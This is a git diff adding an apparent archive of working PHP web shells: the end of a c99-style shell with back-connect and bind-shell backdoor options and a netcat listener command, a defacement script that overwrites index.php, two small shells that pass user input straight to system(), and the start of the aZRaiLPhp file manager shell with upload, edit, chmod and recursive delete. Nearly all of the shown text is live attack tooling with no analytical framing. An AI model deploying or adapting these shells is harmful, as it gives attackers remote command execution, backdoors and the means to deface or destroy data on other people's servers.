+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0OqpaGeyYpqJlRG/rlwAADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+);
+//Untuk optimalisasi ukuran dan kecepatan.
+$imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+}
+else {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+}
+exit;
+}
+if ($act == "about") {
+  echo "<center><b>Credits:</b><br>Idea, leading and coding by <b>tristram [CCTeaM]</b><br>Beta-testing and some tips by <b>NukLeoN [AnTiSh@Re tEaM]</b><br>Re-Coding, tricks, and css by <b>dhie-Q [LamPuNG-HacKerR]</b><br><br> Thanks all who report bugs<br>Please report bugs to <a href=\"mailto:q.dhie@yahoo.com\">dhie-Q</a></b>";
+}
+if ($act == "backc") {
+  $ip = $_SERVER["REMOTE_ADDR"];
+  $msg = $_POST['backcconnmsg'];
+  $emsg = $_POST['backcconnmsge'];
+  echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+  echo("$msg");
+  echo("$emsg");
+}
+if ($act == "shbd"){
+  $msg = $_POST['backcconnmsg'];
+  $emsg = $_POST['backcconnmsge'];
+  echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST>
+  Bind Port: <input type='text' name='backconnectport' value='5992'>
+  <input type='hidden' name='use' value='shbd'>
+  <input type='submit' value='Install Backdoor'></form>");
+  echo("$msg");
+  echo("$emsg");
+  echo("</center>");
+}
+echo "</td></tr></table>\n";
+//COMMANDS PANEL
+?>
+<div  class=barheader2><b>.: COMMANDS PANEL :.</b></div>
+<table class=mainpanel>
+<?php
+if (!$safemode) {
+?>
+<tr><td align=right>Command:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
+    <input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<tr><td align=right>Quick Commands:</td>
+<td><form method="POST">
+    <input type=hidden name=act value="cmd">
+    <input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type=hidden name="cmd_txt" value="1">
+    <select name="cmd">
+    <?php
+    foreach ($cmdaliases as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    foreach ($cmdaliases2 as $als) {
+      echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
+    }
+    ?>
+    </select> -
+    <input type=submit name=submit value="Execute">
+    </form>
+</td></tr>
+<?php
+}
+?>
+
+<tr><td align=right>Upload:</td>
+<td><form method="POST" enctype="multipart/form-data">
+    <input type=hidden name=act value="upload">
+    <input type=hidden name="miniform" value="1">
+    <input type="file" name="uploadfile"> - <input type=submit name=submit value="Upload"> <?php echo $wdt; ?>
+    </form>
+</td></tr>
+<?php /* dhie-Q TriCkz */ ?>
+<script language="javascript">
+function set_arg(txt1,txt2) {
+  document.forms.fphpfsys.arg1.value = txt1;
+  document.forms.fphpfsys.arg2.value = txt2;
+  }
+</script>
+<tr><td align=right>PHP Filesystem:</td>
+<td><form name="fphpfsys" method="POST"><input type=hidden name=act value="phpfsys"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <select name="phpfsysfunc">
+    <?php
+    foreach ($phpfsaliases as $als) {
+      if ($als[1]==$phpfsysfunc) { echo "<option selected value=\"".$als[1]."\">".$als[0]."</option>"; }
+      else { echo "<option value=\"".$als[1]."\">".$als[0]."</option>";  }
+    }
+    ?>
+    </select>
+    File/Dir/URL: <input type="text" name="arg1" id="a1" size="40" value="<?php echo htmlspecialchars($arg1); ?>">
+    To/Max: <input type="text" name="arg2" size="50" value="<?php echo htmlspecialchars($arg2); ?>">
+    <input type=submit name=submit value="Execute"><hr noshade size=1>
+    <a href="#" onclick="set_arg('<?php echo $sh_mainurl."kiddie.txt"; ?>','kiddie.php')">[fx29sh]</a>
+    <a href="#" onclick="set_arg('<?php echo $sh_mainurl."dQ.tar.gz"; ?>','dQ.tar.gz')">[psyBNC]</a>
+    <a href="#" onclick="set_arg('<?php echo $sh_mainurl."dQB.tar.gz"; ?>','dQB.tar.gz')">[Eggdrop]</a>
+    </form>
+</td></tr>
+<tr><td align=right>Search:</td>
+<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;
+    <input type=submit name=submit value="Search">
+    </form>
+    </td></tr>
+<tr><td align=right>Make File:</td>
+<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+    <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="Create"> <?php echo $wdt; ?>
+    </form></td></tr>
+<tr><td align=right>View File:</td>
+<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="View">
+    </form></td></tr>
+</table>
+<div class=barheader2 colspan=2><font color=yellow>SsEs <a href="www.h4cks.in">www.h4cks.in</a> <?php echo round(getmicrotime()-starttime,4); ?></font></div>
+</body></html>
+<?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/xakep-shells/PHP/Test.php.php.txt b/xakep-shells/PHP/Test.php.php.txt
new file mode 100644
index 0000000..2b0e8a3
--- /dev/null
+++ b/xakep-shells/PHP/Test.php.php.txt
@@ -0,0 +1,13 @@
+<?php
+$entry_line="HACKed by EntriKa";
+$fp = fopen("index.php", "w");
+fputs($fp, $entry_line);
+fclose($fp);
+?>
+
+<? 
+$fp =@fopen("index.htm", "a+");
+$yazi = "test" . "\r\n";
+fwrite ($fp, "$yazi");
+fclose ($fp);
+?>
diff --git a/xakep-shells/PHP/WinX Shell.html.txt b/xakep-shells/PHP/WinX Shell.html.txt
new file mode 100644
index 0000000..9957c9f
--- /dev/null
+++ b/xakep-shells/PHP/WinX Shell.html.txt	
@@ -0,0 +1,103 @@
+<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
+<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
+<?php
+
+// -----:[ Start infomation ]:-----
+// It's simple shell for all Win OS.
+// Created by greenwood from n57
+//
+// ------:[ End infomation]:-------
+
+
+set_magic_quotes_runtime(0);
+//*Variables*
+
+//-------------------------------
+
+$veros = `ver`;
+$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
+$windir = `echo %windir%`;
+
+
+//------------------------------
+   if( $cmd == "" ) {
+    $cmd = 'dir /OG /X';
+  }
+//-------------------------------
+
+
+//------------------------------
+
+print "<table  style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\"  border=\"0\" cellspacing=\"1\" cellpadding=\"2\"  >";
+print    "<tr>";
+print      "<td><font color=\"#990000\">You:</font></td>" ;
+print      "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
+print    "</tr>";
+print    "<tr>";
+print      "<td><font color=\"red\">Version OS:</font></td>" ;
+print      "<td><font color=\"#0066CC\"> $veros </font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Server:</font></td>";
+print      "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Win Dir:</font></td>";
+print      "<td><font color=\"#0066CC\"> $windir </font></td>";
+print    "</tr>";
+print  "</table>";
+print  "<br>";
+
+//------- [netstat -an] and [ipconfig] and [tasklist] ------------
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
+print "</form>";
+//-------------------------------
+
+
+//-------------------------------
+
+print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
+       system($cmd);
+print "</textarea>";
+print "<br>";
+
+//-------------------------------
+
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
+print "<br>";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
+print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
+print "</form>";
+
+//-------------------------------
+
+print "<form  enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
+print "<br>";
+print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
+print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
+print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
+print"</form>";
+
+?>
+
+
+<?
+
+// Script for uploading
+ if (is_uploaded_file($userfile)) {
+move_uploaded_file($userfile, $serverfile);
+}
+
+?>
+
+
+<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
+</body></html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Worse Linux Shell.php.txt b/xakep-shells/PHP/Worse Linux Shell.php.txt
new file mode 100644
index 0000000..434721a
--- /dev/null
+++ b/xakep-shells/PHP/Worse Linux Shell.php.txt	
@@ -0,0 +1,69 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>#worst @dal.net</h1></center>";
+print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
+print "<center><h1>Watch Your system Shany was here.</h1></center>";
+print "<center><h1>Linux Shells</h1></center>";
+print "<hr><hr>";
+
+$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName  = `uname -a`;
+$SCWD   = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
+print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
+print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    system($currentCMD);
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>
diff --git a/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt b/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt
new file mode 100644
index 0000000..17aed57
--- /dev/null
+++ b/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt	
@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
+                } else {
+                        $dos = "Dosya Oluþturuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazýlamýyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
